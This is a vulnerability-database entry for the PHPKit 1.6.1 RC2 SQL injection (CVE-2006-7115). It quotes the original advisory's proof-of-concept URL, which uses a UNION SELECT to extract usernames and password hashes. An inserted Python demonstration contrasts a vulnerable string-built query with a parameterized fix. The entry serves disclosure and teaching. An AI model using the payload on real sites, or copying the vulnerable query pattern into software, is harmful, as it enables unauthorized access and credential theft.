PHPKit 'path' Parameter SQL Injection Vulnerability

Vulnerability ID 1191437  Type SQL injection
Published 2007-03-05  Updated 2007-03-05
CVE CVE-2006-7115  CNNVD ID CNNVD-200703-169
Platform N/A  CVSS score 7.5
|Sources
https://www.securityfocus.com/bid/82046
https://cxsecurity.com/issue/WLB-2007030055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-169
|Details
A SQL injection vulnerability exists in PHPKit 1.6.1 RC2. When the path parameter is set to faq/faq.php, a remote attacker can inject arbitrary SQL commands via the catid parameter. An attacker can also inject arbitrary SQL commands via unspecified vectors involving guestbook/print.php.
|Exploit
+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Vendor ............: http://www.phpkit.de/
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+  guestbook/print.php
+  faq/faq.php
+  more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1
+
+
+ Solution:
+  -> Install Hack_Block (search google :))
+  -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------
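As an added illustration (not PHPKit's code and not part of the advisory above), the following Python models the faq/faq.php query that the PoC targets, over an in-memory SQLite database. It parses the PoC URL the way include.php would receive it, runs it through a string-concatenated query of the kind the advisory exploits, and then through a hardened query that type-checks and binds the id. The table names phpkit_faq and phpkit_user, the 13-column FAQ layout (chosen so the PoC's 13-column UNION lines up), the dispatch on path=faq/faq.php, and the sample rows are all assumptions made for the demonstration.

```python
"""Model of the PHPKit 1.6.1 RC2 faq/faq.php 'catid' injection over an in-memory SQLite DB.

Added illustration, not PHPKit's code: table names, the 13-column FAQ layout, the
include.php dispatch and the sample rows are assumptions chosen so the advisory's
UNION payload lines up.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The advisory's PoC URL joined into one line (backslash-escaped quotes removed).
POC_URL = (
    "/include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%20"
    "1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20"
    "FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1"
)

# Constructed sample data (not real PHPKit rows): user_id, user_name, user_pw.
SAMPLE_USER = (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99")


def build_db():
    """Create phpkit_faq (13 columns, so SELECT * yields 13) and phpkit_user (assumed layouts)."""
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"extra{i}" for i in range(9))  # 4 named columns + 9 filler = 13
    conn.execute(f"CREATE TABLE phpkit_faq (faq_id INTEGER, catid INTEGER, question, answer, {extra})")
    conn.execute("CREATE TABLE phpkit_user (user_id INTEGER, user_name TEXT, user_pw TEXT)")
    nulls = ", ".join(["NULL"] * 9)
    conn.execute(f"INSERT INTO phpkit_faq VALUES (1, 1, 'How do I log in?', 'Use the login box.', {nulls})")
    conn.execute(f"INSERT INTO phpkit_faq VALUES (2, 2, 'Is there an API?', 'No.', {nulls})")
    conn.execute("INSERT INTO phpkit_user VALUES (?, ?, ?)", SAMPLE_USER)
    conn.commit()
    return conn


def request_params(url):
    """Parse the query string as it reaches include.php (percent-decoded, first value per key)."""
    qs = parse_qs(urlsplit(url).query)
    return {k: v[0] for k, v in qs.items()}


def faq_query_vulnerable(conn, catid):
    """The pattern the advisory exploits: the raw parameter is pasted into the SQL string."""
    sql = f"SELECT * FROM phpkit_faq WHERE catid='{catid}'"
    return conn.execute(sql).fetchall()


def faq_query_fixed(conn, catid):
    """Hardened form: require an integer id and bind it; anything else matches nothing."""
    try:
        cat = int(catid)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM phpkit_faq WHERE catid=?", (cat,)).fetchall()


def handle_include(conn, url, query_fn):
    """Mimic include.php dispatch (assumed): only path=faq/faq.php reaches the FAQ query."""
    params = request_params(url)
    if params.get("path") != "faq/faq.php":
        return []
    return query_fn(conn, params.get("catid", ""))


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", handle_include(db, POC_URL, faq_query_vulnerable))
    print("fixed:     ", handle_include(db, POC_URL, faq_query_fixed))
```

With the vulnerable query the PoC returns a row whose fifth and sixth columns are the sample user's user_name and user_pw, which is exactly why the payload has to supply 13 columns: a UNION is rejected unless its column count matches the original SELECT, so an attacker counts up until the error disappears. The hardened query is the Python analogue of casting the id to an integer and binding it as a parameter; the escaping the advisory suggests would also close this string-context injection, but for an integer id the cast is the more robust fix.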
|Affected products
PHPKIT PHPKIT 1.6.1 RC2
|References

Source: XF
Name: phpkit-faq-sql-injection(30209)
Link: http://xforce.iss.net/xforce/xfdb/30209
Source: BID
Name: 21002
Link: http://www.securityfocus.com/bid/21002
Source: BUGTRAQ
Name: 20061110 PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/451304/100/0/threaded
Source: OSVDB
Name: 31265
Link: http://www.osvdb.org/31265
Source: MISC
Link: http://www.bb-pcsecurity.de/websecurity/532/org/PHPKit_1.6.1_RC2_%28faq-faq.php%29_Remote_SQL_Injection_Exploit.htm
Source: SECUNIA
Name: 17479
Link: http://secunia.com/advisories/17479
Source: SREASON
Name: 2357
Link: http://securityreason.com/securityalert/2357